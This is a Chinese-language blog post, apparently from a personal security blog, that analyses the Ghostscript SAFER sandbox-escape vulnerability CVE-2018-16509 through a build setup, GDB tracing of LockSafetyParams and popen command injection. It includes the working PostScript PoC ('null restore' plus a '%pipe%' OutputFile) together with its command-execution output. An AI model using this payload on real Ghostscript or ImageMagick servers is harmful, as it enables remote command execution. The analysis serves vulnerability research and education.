<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>CVE-2018-16509——Ghostscript沙箱逃逸漏洞 - Jon Tsang&#39;Blog</title>


    <meta name="description" content="2018年8月21日，Google安全研究员Tavis Ormandy披露了多个GhostScript的漏洞，在9.24之前的版本中，通构造恶意PostScript脚本，可以绕过SAFER安全沙箱，从而造成文件读取、文件删除甚至命令执行等严重后果。其根本原因是GhostScript解析PostScript的”restore“命令时，会暂时将参数“LockSafetyParams”设置为“False">
<meta name="keywords" content="漏洞,CVE,Linux,ghostscrpt">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2018-16509——Ghostscript沙箱逃逸漏洞">
<meta property="og:url" content="https://jontsang.github.io/post/40555.html">
<meta property="og:site_name" content="Jon Tsang&#39;Blog">
<meta property="og:description" content="2018年8月21日，Google安全研究员Tavis Ormandy披露了多个GhostScript的漏洞，在9.24之前的版本中，通构造恶意PostScript脚本，可以绕过SAFER安全沙箱，从而造成文件读取、文件删除甚至命令执行等严重后果。其根本原因是GhostScript解析PostScript的”restore“命令时，会暂时将参数“LockSafetyParams”设置为“False">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/Ghostscript-1.png">
<meta property="og:updated_time" content="2019-09-01T15:56:01.718Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CVE-2018-16509——Ghostscript沙箱逃逸漏洞">
<meta name="twitter:description" content="2018年8月21日，Google安全研究员Tavis Ormandy披露了多个GhostScript的漏洞，在9.24之前的版本中，通构造恶意PostScript脚本，可以绕过SAFER安全沙箱，从而造成文件读取、文件删除甚至命令执行等严重后果。其根本原因是GhostScript解析PostScript的”restore“命令时，会暂时将参数“LockSafetyParams”设置为“False">
<meta name="twitter:image" content="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/Ghostscript-1.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.4.1/css/all.min.css">
<link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
    
    <style>body>.footer,body>.navbar,body>.section{opacity:0}</style>
    

    
    
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">
    

    
    

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">


    
    
    
    

<link rel="stylesheet" href="/css/back-to-top.css">


    
    

    
    
    
    

    
    
<link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

    
    
    
        <script async="" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    

    


<link rel="stylesheet" href="/css/style.css">
</head>
<!-- <body class="is-2-column"> -->
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.svg" alt="CVE-2018-16509——Ghostscript沙箱逃逸漏洞" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">主页</a>
                
                <a class="navbar-item"
                href="/archives">归档</a>
                
                <a class="navbar-item"
                href="/categories">分类</a>
                
                <a class="navbar-item"
                href="/tags">标签</a>
                
                <a class="navbar-item"
                href="/about">关于</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/JonTsang">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main"><div class="card">
    
    <div class="card-image">
        <span  class="image is-7by1">
            <img class="thumbnail" src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/Ghostscript-1.png" alt="CVE-2018-16509——Ghostscript沙箱逃逸漏洞">
        </span>
    </div>
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2018-08-23T07:26:52.000Z">2018-08-23</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/漏洞分析/">漏洞分析</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    18 分钟 读完 (大约 2774 个字)
                </span>
                
                
                <span class="level-item has-text-grey" id="busuanzi_container_page_pv">
                    <i class="far fa-eye"></i>
                    <span id="busuanzi_value_page_pv">0</span>次访问
                </span>
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                CVE-2018-16509——Ghostscript沙箱逃逸漏洞
            
        </h1>
        <div class="content">
            <p>2018年8月21日，Google安全研究员Tavis Ormandy披露了多个GhostScript的漏洞，在9.24之前的版本中，通构造恶意PostScript脚本，可以绕过SAFER安全沙箱，从而造成文件读取、文件删除甚至命令执行等严重后果。其根本原因是GhostScript解析PostScript的”restore“命令时，会暂时将参数“LockSafetyParams”设置为“False”，从而关闭SAFER模式。<br><a id="more"></a></p>
<p>开始分析前，先得说一说PostScript——由Adobe开发的一种页面描述语言（PDL），它桌面出版革命中发挥了关键作用。它是世界上第一个与设备无关的页面描述语言，也是一种编程语言。如今世界各地的企业都依赖PostScript来准确地打印来自任何应用程序的文档，同时也为Adobe PDF格式的发展铺平了道路。</p>
<p>作为一种解释型的语言，PostScript必然需要一个解释器来执行，Ghostscript就是一个广泛应用于各种平台和应用程序的PostScript解释器，ImagineMagic、Python PIL等常用工具都依赖于它。</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>目前大多数Linux发行版中的GhostScript都应该已经更新了，所以我们需要从源码编译安装，可以从<a href="https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs923" target="_blank" rel="noopener">GitHub</a>下载源码，也可以通过git工具下载。</p>
<p>安装环境：Ubuntu Server 16.04.04 64位<br>集成环境：GCC 5.4.0<br>调试环境：GDB-7.11.1</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">$</span><span class="hljs-bash"> tar xvJf ghostscript-9.23.tar.xz</span></span><br><span class="line"><span class="hljs-meta">$</span><span class="hljs-bash"> <span class="hljs-built_in">cd</span> ghostscript-9.23</span></span><br><span class="line"><span class="hljs-meta">$</span><span class="hljs-bash"> apt-get build-dep ghostscript    <span class="hljs-comment">#安装所需依赖</span></span></span><br><span class="line"><span class="hljs-meta">$</span><span class="hljs-bash"> CFLAGS=<span class="hljs-string">"-g -O0"</span> ./configure			 <span class="hljs-comment">#CFLAGS中的两个选项是为了方便后续的调试</span></span></span><br><span class="line"><span class="hljs-meta">$</span><span class="hljs-bash"> make</span></span><br><span class="line"><span class="hljs-meta">$</span><span class="hljs-bash"> make install</span></span><br></pre></td></tr></table></figure>
<p>安装完成就可进入GhostScript的交互界面了</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ gs -sDEVICE=ppmraw</span><br><span class="line">GPL Ghostscript 9.23 (2018-03-21)</span><br><span class="line">Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.</span><br><span class="line">This software comes with NO WARRANTY: see the file PUBLIC for details.</span><br><span class="line">GS&gt;</span><br></pre></td></tr></table></figure>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><h3 id="Ghostscript安全模式"><a href="#Ghostscript安全模式" class="headerlink" title="Ghostscript安全模式"></a>Ghostscript安全模式</h3><p>Ghostscript包含一个可选的<code>-dSAFER</code>选项，设置该选项启动安全沙箱模式后，与文件相关的操作符将被禁止，具体作用如下：</p>
<ol>
<li>禁用deletefile和renamefile操作符，能够打开管道命令（％pipe％cmd），同时只能打开stdout和stderr进行写入</li>
<li>禁用读取stdin以外的文件</li>
<li>设置设备的LockSafetyParams参数为True，从而防止使用OutputFile参数写入文件</li>
<li>阻止/GenericResourceDir、/FontResourceDir、/SystemParamsPassword或/StartJobPassword被更改</li>
</ol>
<p>例如当我们未加<code>-dSAFER</code>参数时，可以成功读取<code>/etc/passwd</code>文件：<br><figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">vuln@ubuntu:~$ gs -q -sDEVICE=ppmraw</span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">/buff 1024 string def</span></span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">/file_obj (/etc/passwd) (r) file def</span></span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">file_obj buff readstring</span></span><br><span class="line">GS&lt;2&gt;buff print</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">...</span><br></pre></td></tr></table></figure></p>
<p>加上<code>-dSAFER</code>参数后，出现<code>invalidfileaccess</code>错误：<br><figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">vuln@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER</span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">/buff 1024 string def</span></span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">/file_obj (/etc/passwd) (r) file def</span></span><br><span class="line">Error: /invalidfileaccess in --file--</span><br><span class="line">Operand stack:</span><br><span class="line">   file_obj   (/etc/passwd)   (r)</span><br><span class="line">Execution stack:</span><br><span class="line"><span class="hljs-meta">   %</span><span class="hljs-bash">interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   %loop_continue   --nostringval--   --nostringval--   <span class="hljs-literal">false</span>   1   %stopped_push   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--</span></span><br><span class="line">Dictionary stack:</span><br><span class="line">   --dict:982/1684(ro)(G)--   --dict:0/20(G)--   --dict:79/200(L)--</span><br><span class="line">Current allocation mode is local</span><br><span class="line">Last OS error: No such file or directory</span><br><span class="line">Current file position is 33</span><br><span class="line">GS&lt;3&gt;</span><br></pre></td></tr></table></figure></p>
<h3 id="PoC分析测试"><a href="#PoC分析测试" class="headerlink" title="PoC分析测试"></a>PoC分析测试</h3><p>多个PostScript操作可以绕过<code>-dSAFER</code>提供的保护，这可以允许攻击者使用任意参数执行命令。首先对Tavis提供的<a href="https://www.exploit-db.com/exploits/45243" target="_blank" rel="noopener">PoC</a>进行测试，在开启了安全沙箱的情况下（-dSAFER），可以成功执行任意shell命令：</p>
<figure class="highlight shell hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">vuln@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null</span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">legal</span></span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">&#123; null restore &#125; stopped &#123; pop &#125; <span class="hljs-keyword">if</span></span></span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">legal</span></span><br><span class="line"><span class="hljs-meta">GS&gt;</span><span class="hljs-bash">mark /OutputFile (%pipe%id) currentdevice putdeviceprops</span></span><br><span class="line">GS&lt;1&gt;showpage</span><br><span class="line">uid=1000(topsec) gid=1000(topsec) groups=1000(topsec),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)</span><br></pre></td></tr></table></figure>
<p>再比如使用前面提到的ImageMagick工具中的convert命令测试，可以看到ImageMagick同样受到了该漏洞的影响：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823135608.png" alt></p>
<p>在源码目录下使用命令<code>grep -nr dSAFER</code>找到和该选项相关的信息，看到下面这段注释中说明了该选项的效果——将<code>LockSafetyParams</code>设置为true。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823135640.jpg" alt></p>
<p>再次使用<code>grep</code>命令查看和<code>LockSafetyParams</code>相关的代码，通过注释看到，这个变量值为<code>true</code>时，可以阻止某些不安全的更改。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823135721.jpg" alt></p>
<p>同时在文件psi/zdevice2.c的第269行，<code>LockSafetyParams</code>被设置为了<code>False</code>，且仅有此处修改了该变量，因此可以推测：Ghostscript在解析PoC中某条PostScript语句时触发了这段代码。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823135808.jpg" alt></p>
<h3 id="调试分析过程"><a href="#调试分析过程" class="headerlink" title="调试分析过程"></a>调试分析过程</h3><p>接下来我们通过调试来验证前面的猜想，使用GDB调试Ghostscript并设置好程序参数，根据前面grep的输出，在“dev_old-&gt;LockSafetyParams = false; ”这段代码所在函数<code>restore_page_device()</code>中设置断点。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; set args -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null</span><br><span class="line">pwndbg&gt; b restore_page_device</span><br><span class="line">Breakpoint 1 at 0xa9395e: file ./psi/zdevice2.c, line 256.</span><br><span class="line">pwndbg&gt; r</span><br><span class="line">Starting program: /usr/local/bin/gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null</span><br><span class="line">[Thread debugging using libthread_db enabled]</span><br><span class="line">Using host libthread_db library &quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;.</span><br><span class="line">GS&gt;</span><br></pre></td></tr></table></figure>
<p>程序运行起来后，根据PoC输入代码：</p>
<p>首先设置成像区域——legal（a4、b5、letter等也可以）：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823135858.jpg" alt></p>
<p>接着输入<code>{null restore} stopped {pop} if</code>，程序中断在此处： </p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823135926.JPG" alt></p>
<p>再对dev_old-&gt;LockSafetyParams变量设置观察点，继续运行程序两次以后，和我们预想的结果一样——<code>LockSafetyParams</code>的值在这里被改变了。 </p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; c</span><br><span class="line">Continuing.</span><br><span class="line"></span><br><span class="line">Hardware watchpoint 2: dev_old-&gt;LockSafetyParams</span><br><span class="line"></span><br><span class="line">Old value = 1</span><br><span class="line">New value = 0</span><br><span class="line">restore_page_device (pgs_old=0x219cbd8, pgs_new=0x274d630) at ./psi/zdevice2.c:269</span><br><span class="line">269	    dev_old-&gt;LockSafetyParams = false;</span><br></pre></td></tr></table></figure>
<p>这里要注意的是，用例如GCC开启了优化选项（如-O3），那么某些变量可能会被优化掉，比如这里为变量dev_old-&gt;LockSafetyParams设置观察点时，按照默认配置编译的情况下GDB会提示<code>value has been optimized out</code>，这就是前面编译时要使（-O0）的原因，实际上在调试程序时，我们都应该使用该选项。</p>
<p>使用bt命令查看栈回溯，发现当前函数在一系列带有“interpret”的函数中被调用，从名称推断这些函数用于解析PostScript语句，并且我们现在处于restore操作符相关的函数中。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823140301.jpg" alt></p>
<p>所以要找到解释器解析操作符的函数，可以使用两次finish命令到栈帧#3中，可以看到interp()函数应该是通过call_operator宏来执行各种操作符的。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823142355.jpg" alt="原本在新浪图床的挂了。。。找不回来了"></p>
<p>在调用call_operator宏的这一行下断，断下后单步跟进call_operator，观察到了解释器处理stop、restore等操作符的过程，至此SAFER沙箱如何被绕的过程就逐渐清晰了。</p>
<h2 id="漏洞成因探究"><a href="#漏洞成因探究" class="headerlink" title="漏洞成因探究"></a>漏洞成因探究</h2><p>经过上面的分析我们可以知道简单的一条<code>{null restore} stopped {pop} if</code>就能绕过SAFER沙箱，但其原理又是什么呢，下面就来具体分析一下。</p>
<p>PostScript是一种“逆波兰式”（也称为后缀表达式）的语言，熟悉数据结构的读者想必立刻就明白了。简单来说，就是将操作数放在操作符之前。例如计算表达式(3 + 4) * (5 - 8)的过程如下：</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ gs -q -sDEVICE=ppmraw</span><br><span class="line">GS&gt;3 4 add 5 8 sub mul ==</span><br><span class="line">-21</span><br></pre></td></tr></table></figure>
<p>上述代码的每个步骤如下表所示，采用这种方式的好处是不需要对表达式进行语法分析，所以解释器可以设计的较为简单。</p>
<table>
<thead>
<tr>
<th>处理的符号</th>
<th>操作</th>
<th>栈的内容</th>
</tr>
</thead>
<tbody>
<tr>
<td>3</td>
<td>压栈</td>
<td>3</td>
</tr>
<tr>
<td>4</td>
<td>压栈</td>
<td>3 4</td>
</tr>
<tr>
<td>add</td>
<td>出栈栈顶两个元素，计算加法，计算结果压栈</td>
<td>7</td>
</tr>
<tr>
<td>5</td>
<td>压栈</td>
<td>7 5</td>
</tr>
<tr>
<td>8</td>
<td>压栈</td>
<td>7 5 8</td>
</tr>
<tr>
<td>sub</td>
<td>出栈栈顶两个元素，计算减法，计算结果压栈</td>
<td>7 -3</td>
</tr>
<tr>
<td>mul</td>
<td>出栈栈顶两个元素，计算乘法，计算结果压栈</td>
<td>-21</td>
</tr>
<tr>
<td>==</td>
<td>出栈栈顶一个元素，并显示</td>
<td>NULL</td>
</tr>
</tbody>
</table>
<p>大多数的编程语言都实现了异常处理机制，用于处理软件或信息系统中出现的异常状况（即超出程序正常执行流程的某些特殊条件），同样的PostScript也不例外。我们可以通过将代码包含在<code>{…} stopped</code>中来捕获运算符中的错误，就如同PoC中这样</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123; </span><br><span class="line">	null restore </span><br><span class="line">&#125; stopped &#123;</span><br><span class="line">	pop</span><br><span class="line">&#125; if</span><br></pre></td></tr></table></figure>
<p>对于大多数运算符而言，null不是合法的操作数，stopped捕获到了前面的语句中发生的错误，它将终止该过程并执行stopped操作符后{}中的过程。</p>
<p>完整过程如下：</p>
<p>PostScript中有一对运算符save和restore，分别用来保存和恢复虚拟内存状态的快照，PoC中的<code>null restore</code>语句执行时，相关函数restore_page_device()会将LockSafetyParams设置为false，以便它有权限可以正确配置已恢复的设备，但是还未来得及恢复LockSafetyParams的值便引起类型检查错误（/typecheck error）。接着stopped捕获到异常，弹出栈顶元素null，GS继续运行，此时LockSafetyParams就是一直为false的状态。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823140114.jpg" alt></p>
<p>值得一提的是，GhostScript的官方文档中提到了restore操作符存在导致绕过SAFER模式的风险。<br><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823140200.jpg" alt></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>OutputFile参数用于设置输出文件名，另外在Linux/Unix上，还可以通过设备%pipe%将输出发送到管道（Windows中也可以，需要使用两个%）。例如，要将输出通过管道传输到lpr可以使用：<code>/OutputFile (%pipe%lpr）</code>。查阅官方文档可知，%pipe%功能由popen函数支持，在调试中也能确认这一点： </p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823140435.JPG" alt></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823140448.jpg" alt></p>
<p><code>popen()</code>函数通过创建管道的方式，调用<code>fork()</code>启动一个子进程，并将传入<code>popen()</code>的命令送到<code>/bin/sh</code>以-c参数执行。可以通过在此处注入命令实现漏洞利用，如下图中演示的那样，另外将PostScript编码到图像中，可以在使用GhostScript的Web服务器上执行任意指令（例如服务器使用ImageMagick处理上传的图像时）。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823140543.png" alt></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823141418.png" alt="get shell"></p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="http://seclists.org/oss-sec/2018/q3/142" target="_blank" rel="noopener">More Ghostscript Issues: Should we disable PS coders in policy.xml by default?</a><br><a href="https://www.adobe.com/content/dam/acom/en/devnet/actionscript/articles/PLRM.pdf" target="_blank" rel="noopener">PostScript Language Reference(third edition)</a><br><a href="https://paper.seebug.org/68/" target="_blank" rel="noopener">PostScript语言安全研究(ImageMagick新漏洞分析</a><br><a href="https://www.ghostscript.com/doc/9.23/Language.htm" target="_blank" rel="noopener">Ghostscript官方文档</a><br><a href="https://ruxcon.org.au/assets/2017/slides/hong-ps-and-gs-ruxcon2017.pdf" target="_blank" rel="noopener">A GHOST FROM POSTSCRIPT</a></p>

        </div>
        <!-- 文章结尾添加版权声明 从这里开始 -->
        
        <ul class="post-copyright">
        <li><strong>本文标题：</strong><a href="https://jontsang.github.io/post/40555.html">CVE-2018-16509——Ghostscript沙箱逃逸漏洞</a></li>
        <li><strong>本文作者：</strong><a href="https://jontsang.github.io">Jon Tsang</a></li>
        <!-- <li><strong>本文链接：</strong><a href="https://jontsang.github.io/post/40555.html">https://jontsang.github.io/post/40555.html</a></li> -->
        <li><strong>发布时间：</strong>2018-08-23</li>
        <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！</li>
        </ul>
        
        <!-- 文章结尾添加版权声明 到这里结束 -->
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/CVE/">CVE</a>, <a class="has-link-grey -link" href="/tags/Linux/">Linux</a>, <a class="has-link-grey -link" href="/tags/ghostscrpt/">ghostscrpt</a>, <a class="has-link-grey -link" href="/tags/漏洞/">漏洞</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3>
        <div class="buttons is-centered">
            
                
<a class="button is-info donate">
    <span class="icon is-small">
        <i class="fab fa-alipay"></i>
    </span>
    <span>支付宝</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="支付宝"></div>
</a>

                
                
<a class="button is-success donate">
    <span class="icon is-small">
        <i class="fab fa-weixin"></i>
    </span>
    <span>微信</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="微信"></div>
</a>

                
        </div>
    </div>
</div>



<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/post/cecfe556.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">2018网鼎杯RE——martricks</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/post/72ca88fe.html">
                <span class="level-item">2018网鼎杯PWN-easyFMT</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="valine-thread" class="content"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#valine-thread' ,
        notify: true,
        verify: false,
        app_id: '2oTcdkk2ubE6P9DwKwwTTlDK-gzGzoHsz',
        app_key: 'z1TMyiu5W0zvLI3qKElhM6uU',
        placeholder: '不用注册也可以评论哟~支持Markdown~'
    });
</script>

    </div>
</div>
</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        
<div class="card widget" id="toc">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                目录
            </h3>
            <ul class="menu-list"><li>
        <a class="is-flex" href="#环境搭建">
        <span class="has-mr-6">1</span>
        <span>环境搭建</span>
        </a></li><li>
        <a class="is-flex" href="#漏洞分析">
        <span class="has-mr-6">2</span>
        <span>漏洞分析</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#Ghostscript安全模式">
        <span class="has-mr-6">2.1</span>
        <span>Ghostscript安全模式</span>
        </a></li><li>
        <a class="is-flex" href="#PoC分析测试">
        <span class="has-mr-6">2.2</span>
        <span>PoC分析测试</span>
        </a></li><li>
        <a class="is-flex" href="#调试分析过程">
        <span class="has-mr-6">2.3</span>
        <span>调试分析过程</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#漏洞成因探究">
        <span class="has-mr-6">3</span>
        <span>漏洞成因探究</span>
        </a></li><li>
        <a class="is-flex" href="#漏洞利用">
        <span class="has-mr-6">4</span>
        <span>漏洞利用</span>
        </a></li><li>
        <a class="is-flex" href="#参考资料">
        <span class="has-mr-6">5</span>
        <span>参考资料</span>
        </a></li></ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.svg" alt="CVE-2018-16509——Ghostscript沙箱逃逸漏洞" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2019 Jon Tsang&nbsp;
                <!--Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>-->
                
                <br>
                <span id="busuanzi_container_site_uv">
                共<span id="busuanzi_value_site_uv">0</span>个访客
                </span>
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>

<script>
var IcarusThemeSettings = {
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


